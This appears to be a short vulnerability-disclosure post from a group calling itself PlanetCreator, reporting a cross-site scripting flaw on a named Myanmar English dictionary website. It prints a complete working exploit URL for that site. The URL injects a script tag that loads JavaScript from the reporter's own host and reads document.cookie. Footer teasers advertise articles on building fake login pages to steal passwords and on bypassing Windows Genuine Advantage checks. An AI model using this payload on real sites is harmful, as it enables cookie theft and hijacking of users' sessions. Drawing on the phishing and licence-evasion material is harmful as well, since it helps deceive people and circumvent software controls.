PlanetCreator has reported another critical XSS Vulnerability on Ayar Myanmar – English Dictionary Website :    Owned by Ayar Myanmar Unicode Group.

Test XSS :

http://myanmardictionary.co.cc/feedback.php?page=1&q=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E

This vulnerability has been alerted to :- webmaster

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

What are whois queries?

Whois queries are used to determine the IP address ranges associated with clients. A whois query can be run on most UNIX environments. In a Windows environment, the tools such

Password stealing using fake login page

It’s quite easy to construct a bogus login page and steal password. Let’s look at the methods used to construct a fake login screen and how hackers steal your password.

How to Remove Windows Genuine Advantage Notifications

Windows genuine advantage notifications occur when your computer hasn’t passed the validation test. The validation test can be failed due to being sold a pirated (non-genuine) copy of XP, or